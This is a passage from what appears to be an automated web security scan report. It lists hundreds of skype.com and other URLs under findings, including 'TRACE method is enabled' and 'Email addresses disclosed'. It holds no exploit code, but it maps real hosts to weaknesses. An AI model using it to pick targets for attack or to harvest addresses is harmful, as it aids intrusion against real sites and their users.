18.555. http://www.skype.com/intl/en-us/features

18.556. http://www.skype.com/intl/en-us/features/

18.557. http://www.skype.com/intl/en-us/features/allfeatures/call-forwarding

18.558. http://www.skype.com/intl/en-us/features/allfeatures/call-forwarding/

18.559. http://www.skype.com/intl/en-us/features/allfeatures/call-phones-and-mobiles

18.560. http://www.skype.com/intl/en-us/features/allfeatures/call-phones-and-mobiles/

18.561. http://www.skype.com/intl/en-us/features/allfeatures/call-transfer

18.562. http://www.skype.com/intl/en-us/features/allfeatures/call-transfer/

18.563. http://www.skype.com/intl/en-us/features/allfeatures/caller-identification

18.564. http://www.skype.com/intl/en-us/features/allfeatures/caller-identification/

18.565. http://www.skype.com/intl/en-us/features/allfeatures/conference-calls

18.566. http://www.skype.com/intl/en-us/features/allfeatures/conference-calls/

18.567. http://www.skype.com/intl/en-us/features/allfeatures/facebook

18.568. http://www.skype.com/intl/en-us/features/allfeatures/facebook/

18.569. http://www.skype.com/intl/en-us/features/allfeatures/group-video-calls

18.570. http://www.skype.com/intl/en-us/features/allfeatures/group-video-calls/

18.571. http://www.skype.com/intl/en-us/features/allfeatures/instant-messaging

18.572. http://www.skype.com/intl/en-us/features/allfeatures/instant-messaging/

18.573. http://www.skype.com/intl/en-us/features/allfeatures/online-number

18.574. http://www.skype.com/intl/en-us/features/allfeatures/online-number/

18.575. http://www.skype.com/intl/en-us/features/allfeatures/screen-sharing

18.576. http://www.skype.com/intl/en-us/features/allfeatures/screen-sharing/

18.577. http://www.skype.com/intl/en-us/features/allfeatures/send-files

18.578. http://www.skype.com/intl/en-us/features/allfeatures/send-files/

18.579. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-go-number

18.580. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-go-number/

18.581. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-skype-calls

18.582. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-skype-calls/

18.583. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi

18.584. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi/

18.585. http://www.skype.com/intl/en-us/features/allfeatures/sms

18.586. http://www.skype.com/intl/en-us/features/allfeatures/sms/

18.587. http://www.skype.com/intl/en-us/features/allfeatures/video-call

18.588. http://www.skype.com/intl/en-us/features/allfeatures/video-call/

18.589. http://www.skype.com/intl/en-us/features/allfeatures/voicemail

18.590. http://www.skype.com/intl/en-us/features/allfeatures/voicemail/

18.591. http://www.skype.com/intl/en-us/get-skype

18.592. http://www.skype.com/intl/en-us/get-skype/

18.593. http://www.skype.com/intl/en-us/get-skype/home-phone

18.594. http://www.skype.com/intl/en-us/get-skype/home-phone/

18.595. http://www.skype.com/intl/en-us/get-skype/home-phone/cordless-phone

18.596. http://www.skype.com/intl/en-us/get-skype/home-phone/cordless-phone/

18.597. http://www.skype.com/intl/en-us/get-skype/home-phone/phone-adapter

18.598. http://www.skype.com/intl/en-us/get-skype/home-phone/phone-adapter/

18.599. http://www.skype.com/intl/en-us/get-skype/on-your-computer/click-to-call

18.600. http://www.skype.com/intl/en-us/get-skype/on-your-computer/click-to-call/

18.601. http://www.skype.com/intl/en-us/get-skype/on-your-computer/linux

18.602. http://www.skype.com/intl/en-us/get-skype/on-your-computer/linux/

18.603. http://www.skype.com/intl/en-us/get-skype/on-your-computer/macosx

18.604. http://www.skype.com/intl/en-us/get-skype/on-your-computer/macosx/

18.605. http://www.skype.com/intl/en-us/get-skype/on-your-computer/windows

18.606. http://www.skype.com/intl/en-us/get-skype/on-your-computer/windows/

18.607. http://www.skype.com/intl/en-us/get-skype/on-your-mobile

18.608. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/

18.609. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/builtin/nokia-n900

18.610. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype

18.611. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype/

18.612. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype

18.613. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype/

18.614. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-android

18.615. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-android/

18.616. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian

18.617. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian/

18.618. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-mobile

18.619. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-mobile/

18.620. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-on-3/

18.621. http://www.skype.com/intl/en-us/get-skype/on-your-tv

18.622. http://www.skype.com/intl/en-us/get-skype/on-your-tv/

18.623. http://www.skype.com/intl/en-us/get-skype/other-downloads/

18.624. http://www.skype.com/intl/en-us/legal/terms/fair_usage

18.625. http://www.skype.com/intl/en-us/legal/terms/fair_usage/

18.626. http://www.skype.com/intl/en-us/legal/terms/gvc-fair-usage/

18.627. http://www.skype.com/intl/en-us/prices

18.628. http://www.skype.com/intl/en-us/prices/

18.629. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-afghanistan

18.630. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-albania

18.631. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-algeria

18.632. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-american-samoa

18.633. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-andorra

18.634. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-angola

18.635. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-anguilla

18.636. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-antarctica

18.637. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-antigua-and-barbuda

18.638. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-argentina

18.639. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-armenia

18.640. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-aruba

18.641. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ascension-islands

18.642. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-australia

18.643. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-austria

18.644. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-azerbaijan

18.645. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bahamas

18.646. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bahrain

18.647. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bangladesh

18.648. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-barbados

18.649. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belarus

18.650. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belgium

18.651. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belize

18.652. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-benin

18.653. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bermuda

18.654. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bhutan

18.655. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bolivia

18.656. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bosnia-and-herzegovina

18.657. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-botswana

18.658. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-brazil

18.659. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-british-indian-ocean-territory

18.660. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-british-virgin-islands

18.661. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-brunei

18.662. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bulgaria

18.663. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-burkina-faso

18.664. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-burundi

18.665. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cambodia

18.666. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cameroon

18.667. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-canada

18.668. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cape-verde

18.669. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cayman-islands

18.670. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-central-african-republic

18.671. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-chad

18.672. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-chile

18.673. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-china

18.674. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-china-hong-kong-s.a.r.

18.675. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-colombia

18.676. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-comoros

18.677. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-congo

18.678. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cook-islands

18.679. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-costa-rica

18.680. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cote-divoire

18.681. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-croatia

18.682. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cuba

18.683. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cyprus

18.684. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-czech-republic

18.685. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-denmark

18.686. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-djibouti

18.687. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-dominica

18.688. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-dominican-republic

18.689. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ecuador

18.690. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-egypt

18.691. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-el-salvador

18.692. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-equatorial-guinea

18.693. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-eritrea

18.694. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-estonia

18.695. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ethiopia

18.696. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-falkland-islands-malvinas

18.697. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-faroe-islands

18.698. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-fiji

18.699. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-finland

18.700. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-france

18.701. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-french-guiana

18.702. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-french-polynesia

18.703. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gabon

18.704. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gambia

18.705. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-georgia

18.706. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-germany

18.707. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ghana

18.708. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gibraltar

18.709. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-greece

18.710. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-greenland

18.711. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-grenada

18.712. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guadeloupe

18.713. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guam

18.714. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guatemala

18.715. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guinea

18.716. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guinea-bissau

18.717. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guyana

18.718. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-haiti

18.719. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-honduras

18.720. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-hungary

18.721. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iceland

18.722. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-india

18.723. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-indonesia

18.724. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-inmarsat

18.725. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-inum

18.726. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iran

18.727. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iraq

18.728. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ireland

18.729. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-israel

18.730. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-italy

18.731. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-jamaica

18.732. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-japan

18.733. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-jordan

18.734. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kazakhstan

18.735. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kenya

18.736. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kiribati

18.737. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kuwait

18.738. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kyrgyzstan

18.739. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-laos

18.740. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-latvia

18.741. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lebanon

18.742. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lesotho

18.743. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-liberia

18.744. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-libya

18.745. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-liechtenstein

18.746. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lithuania

18.747. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-luxembourg

18.748. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-macao

18.749. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-macedonia

18.750. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-madagascar

18.751. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-malawi

18.752. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-malaysia

18.753. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-maldives

18.754. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-mexico

18.755. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-netherlands

18.756. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-new-zealand

18.757. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-north-korea

18.758. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-norway

18.759. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-poland

18.760. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-portugal

18.761. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-puerto-rico

18.762. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-russia

18.763. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-singapore

18.764. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-south-korea

18.765. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-spain

18.766. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-sweden

18.767. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-switzerland

18.768. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-taiwan

18.769. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tanzania

18.770. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-thailand

18.771. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-the-democratic-republic-of-the-congo

18.772. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-timor-leste

18.773. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-togo

18.774. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tokelau

18.775. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tonga

18.776. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-trinidad-and-tobago

18.777. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tunisia

18.778. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turkey

18.779. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turkmenistan

18.780. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turks-and-caicos-islands

18.781. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tuvalu

18.782. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uganda

18.783. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ukraine

18.784. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-arab-emirates

18.785. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-kingdom

18.786. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-states

18.787. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uruguay

18.788. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-us-virgin-islands

18.789. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uzbekistan

18.790. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vanuatu

18.791. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vatican-city-state-holy-see

18.792. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-venezuela

18.793. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vietnam

18.794. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-wallis-and-futuna

18.795. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-yemen

18.796. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-zambia

18.797. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-zimbabwe

18.798. http://www.skype.com/intl/en-us/prices/pay-monthly

18.799. http://www.skype.com/intl/en-us/prices/pay-monthly/

18.800. http://www.skype.com/intl/en-us/prices/payg-rates

18.801. http://www.skype.com/intl/en-us/prices/payg-rates-special-offer/

18.802. http://www.skype.com/intl/en-us/prices/payg-rates/

18.803. http://www.skype.com/intl/en-us/prices/payg-rates/connection-fees/

18.804. http://www.skype.com/intl/en-us/prices/premium

18.805. http://www.skype.com/intl/en-us/prices/premium/

18.806. http://www.skype.com/intl/en-us/prices/skype-credit

18.807. http://www.skype.com/intl/en-us/prices/skype-credit/

18.808. http://www.skype.com/intl/en-us/prices/sms-rates

18.809. http://www.skype.com/intl/en-us/prices/sms-rates/

18.810. http://www.skype.com/intl/en-us/prices/ways-to-pay/

18.811. http://www.skype.com/intl/en-us/special-offers

18.812. http://www.skype.com/intl/en-us/special-offers/

18.813. http://www.skype.com/intl/en-us/tell-a-friend/

18.814. http://www.skype.com/intl/en-us/tell-a-friend/preview/

18.815. http://www.skype.com/intl/en-us/tell-a-friend/shared/

18.816. http://www.skype.com/intl/en/business

18.817. http://www.skype.com/intl/en/business-user-guide/pc/

18.818. http://www.skype.com/intl/en/business/

18.819. http://www.skype.com/intl/en/business/download

18.820. http://www.skype.com/intl/en/business/download/

18.821. http://www.skype.com/intl/en/business/group-video

18.822. http://www.skype.com/intl/en/business/group-video/

18.823. http://www.skype.com/intl/en/business/partners/overview

18.824. http://www.skype.com/intl/en/business/skype-connect

18.825. http://www.skype.com/intl/en/business/skype-connect/

18.826. http://www.skype.com/intl/en/business/skype-manager

18.827. http://www.skype.com/intl/en/business/skype-manager/

18.828. http://www.skype.com/intl/en/campaigns/toolbar/

18.829. http://www.skype.com/intl/en/features

18.830. http://www.skype.com/intl/en/features/

18.831. http://www.skype.com/intl/en/features/allfeatures/call-forwarding

18.832. http://www.skype.com/intl/en/features/allfeatures/call-forwarding/

18.833. http://www.skype.com/intl/en/features/allfeatures/call-phones-and-mobiles

18.834. http://www.skype.com/intl/en/features/allfeatures/call-phones-and-mobiles/

18.835. http://www.skype.com/intl/en/features/allfeatures/call-transfer

18.836. http://www.skype.com/intl/en/features/allfeatures/call-transfer/

18.837. http://www.skype.com/intl/en/features/allfeatures/caller-identification

18.838. http://www.skype.com/intl/en/features/allfeatures/caller-identification/

18.839. http://www.skype.com/intl/en/features/allfeatures/conference-calls

18.840. http://www.skype.com/intl/en/features/allfeatures/conference-calls/

18.841. http://www.skype.com/intl/en/features/allfeatures/facebook

18.842. http://www.skype.com/intl/en/features/allfeatures/facebook/

18.843. http://www.skype.com/intl/en/features/allfeatures/group-video-calls

18.844. http://www.skype.com/intl/en/features/allfeatures/group-video-calls/

18.845. http://www.skype.com/intl/en/features/allfeatures/instant-messaging

18.846. http://www.skype.com/intl/en/features/allfeatures/instant-messaging/

18.847. http://www.skype.com/intl/en/features/allfeatures/online-number

18.848. http://www.skype.com/intl/en/features/allfeatures/online-number/

18.849. http://www.skype.com/intl/en/features/allfeatures/screen-sharing

18.850. http://www.skype.com/intl/en/features/allfeatures/screen-sharing/

18.851. http://www.skype.com/intl/en/features/allfeatures/send-files

18.852. http://www.skype.com/intl/en/features/allfeatures/send-files/

18.853. http://www.skype.com/intl/en/features/allfeatures/skype-to-go-number

18.854. http://www.skype.com/intl/en/features/allfeatures/skype-to-go-number/

18.855. http://www.skype.com/intl/en/features/allfeatures/skype-to-skype-calls

18.856. http://www.skype.com/intl/en/features/allfeatures/skype-to-skype-calls/

18.857. http://www.skype.com/intl/en/features/allfeatures/skype-wifi

18.858. http://www.skype.com/intl/en/features/allfeatures/skype-wifi/

18.859. http://www.skype.com/intl/en/features/allfeatures/sms

18.860. http://www.skype.com/intl/en/features/allfeatures/sms/

18.861. http://www.skype.com/intl/en/features/allfeatures/video-call

18.862. http://www.skype.com/intl/en/features/allfeatures/video-call/

18.863. http://www.skype.com/intl/en/features/allfeatures/voicemail

18.864. http://www.skype.com/intl/en/features/allfeatures/voicemail/

18.865. http://www.skype.com/intl/en/get-skype

18.866. http://www.skype.com/intl/en/get-skype/

18.867. http://www.skype.com/intl/en/get-skype/on-your-computer/click-to-call

18.868. http://www.skype.com/intl/en/get-skype/on-your-computer/click-to-call/

18.869. http://www.skype.com/intl/en/get-skype/on-your-computer/linux

18.870. http://www.skype.com/intl/en/get-skype/on-your-computer/linux/

18.871. http://www.skype.com/intl/en/get-skype/on-your-computer/macosx

18.872. http://www.skype.com/intl/en/get-skype/on-your-computer/macosx/

18.873. http://www.skype.com/intl/en/get-skype/on-your-computer/windows

18.874. http://www.skype.com/intl/en/get-skype/on-your-computer/windows/

18.875. http://www.skype.com/intl/en/get-skype/on-your-mobile

18.876. http://www.skype.com/intl/en/get-skype/on-your-mobile/

18.877. http://www.skype.com/intl/en/get-skype/on-your-mobile/built-in/3-skype-phone

18.878. http://www.skype.com/intl/en/get-skype/on-your-mobile/builtin/nokia-n900

18.879. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/ipad-for-skype

18.880. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/ipad-for-skype/

18.881. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/iphone-for-skype

18.882. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/iphone-for-skype/

18.883. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-android

18.884. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-android/

18.885. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-symbian

18.886. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-symbian/

18.887. http://www.skype.com/intl/en/get-skype/on-your-mobile/skype-on-3/

18.888. http://www.skype.com/intl/en/get-skype/on-your-tv

18.889. http://www.skype.com/intl/en/get-skype/on-your-tv/

18.890. http://www.skype.com/intl/en/get-skype/other-downloads/

18.891. http://www.skype.com/intl/en/prices

18.892. http://www.skype.com/intl/en/prices/

18.893. http://www.skype.com/intl/en/prices/pay-monthly

18.894. http://www.skype.com/intl/en/prices/pay-monthly/

18.895. http://www.skype.com/intl/en/prices/payg-rates

18.896. http://www.skype.com/intl/en/prices/payg-rates/

18.897. http://www.skype.com/intl/en/prices/premium

18.898. http://www.skype.com/intl/en/prices/premium/

18.899. http://www.skype.com/intl/en/prices/skype-credit

18.900. http://www.skype.com/intl/en/prices/skype-credit/

18.901. http://www.skype.com/intl/en/prices/sms-rates

18.902. http://www.skype.com/intl/en/prices/sms-rates/

18.903. http://www.skype.com/intl/en/prices/subscriptions/

18.904. http://www.skype.com/intl/en/prices/ways-to-pay/

18.905. http://www.skype.com/intl/en/special-offers

18.906. http://www.skype.com/intl/en/special-offers/

18.907. http://www.skype.com/products

18.908. https://www.trustwave.com/

18.909. https://www.trustwave.com/web-application-firewall/

18.910. http://www.w3schools.com/banners/aspallbannerframe.asp

18.911. http://www.w3schools.com/banners/aspallframe.asp

18.912. http://www.w3schools.com/js/js_ex_dom.asp

18.913. http://www.w3schools.com/jsref/dom_obj_base.asp

18.914. http://www.w3schools.com/jsref/dom_obj_frame.asp

18.915. http://www.w3schools.com/jsref/event_frame_onload.asp

18.916. http://www.w3schools.com/tryitbanner.asp

18.917. http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps

19. TRACE method is enabled

19.1. http://142.xg4ken.com/

19.2. http://afe.specificclick.net/

19.3. http://apps.sapha.com/

19.4. http://apr.lijit.com/

19.5. http://blogs.skype.com/

19.6. https://blogs.skype.com/

19.7. http://cache.specificmedia.com/

19.8. http://ce.lijit.com/

19.9. http://dce.sapha.com/

19.10. https://developer.skype.com/

19.11. http://embed.technorati.com/

19.12. http://pixel.33across.com/

19.13. http://rotation.linuxnewmedia.com/

19.14. http://shop.skype.com/

19.15. http://vap1den1.lijit.com/

19.16. http://vap2den1.lijit.com/

19.17. http://vap3den1.lijit.com/

19.18. http://welcome.hp-ww.com/

19.19. http://www.cymphonix.com/

19.20. http://www.lijit.com/

19.21. http://www.typepad.com/

19.22. http://www.xg4ken.com/

20. Email addresses disclosed

20.1. https://apps.skypeassets.com/static/skype.login/js/pwa-complete.js

20.2. https://apps.skypeassets.com/static/skype.login/js/wbr-complete.js

20.3. http://blogs.skype.com/en/2005/05/

20.4. http://blogs.skype.com/en/2005/06/

20.5. http://blogs.skype.com/en/2005/07/

20.6. http://blogs.skype.com/en/2005/08/

20.7. http://blogs.skype.com/en/2005/09/

20.8. http://blogs.skype.com/en/2005/10/

20.9. http://blogs.skype.com/en/2005/11/

20.10. http://blogs.skype.com/en/2005/12/

20.11. http://blogs.skype.com/en/2006/01/

20.12. http://blogs.skype.com/en/2006/02/

20.13. http://blogs.skype.com/en/2006/03/

20.14. http://blogs.skype.com/en/2006/04/

20.15. http://blogs.skype.com/en/2006/05/

20.16. http://blogs.skype.com/en/2006/06/

20.17. http://blogs.skype.com/en/2006/07/

20.18. http://blogs.skype.com/en/2006/08/

20.19. http://blogs.skype.com/en/2006/09/

20.20. http://blogs.skype.com/en/2006/10/

20.21. http://blogs.skype.com/en/2006/11/

20.22. http://blogs.skype.com/en/2006/12/

20.23. http://blogs.skype.com/en/2007/01/

20.24. http://blogs.skype.com/en/2007/02/

20.25. http://blogs.skype.com/en/2007/03/

20.26. http://blogs.skype.com/en/2007/05/

20.27. http://blogs.skype.com/en/2007/06/

20.28. http://blogs.skype.com/en/2007/07/

20.29. http://blogs.skype.com/en/2007/08/

20.30. http://blogs.skype.com/en/2007/10/

20.31. http://blogs.skype.com/en/2007/11/

20.32. http://blogs.skype.com/en/2008/01/

20.33. http://blogs.skype.com/en/2008/04/

20.34. http://blogs.skype.com/en/2008/06/

20.35. http://blogs.skype.com/en/2008/07/

20.36. http://blogs.skype.com/en/2008/09/

20.37. http://blogs.skype.com/en/2008/10/

20.38. http://blogs.skype.com/en/2009/03/

20.39. http://blogs.skype.com/en/2009/08/

20.40. http://blogs.skype.com/en/2009/10/

20.41. http://blogs.skype.com/en/2009/11/

20.42. http://blogs.skype.com/en/2010/01/

20.43. http://blogs.skype.com/en/2010/02/

20.44. http://blogs.skype.com/en/2010/03/

20.45. http://blogs.skype.com/en/2010/04/

20.46. http://blogs.skype.com/en/2010/07/

20.47. http://blogs.skype.com/en/2010/08/

20.48. http://blogs.skype.com/en/2010/09/

20.49. http://blogs.skype.com/en/2010/10/

20.50. http://blogs.skype.com/en/2010/11/

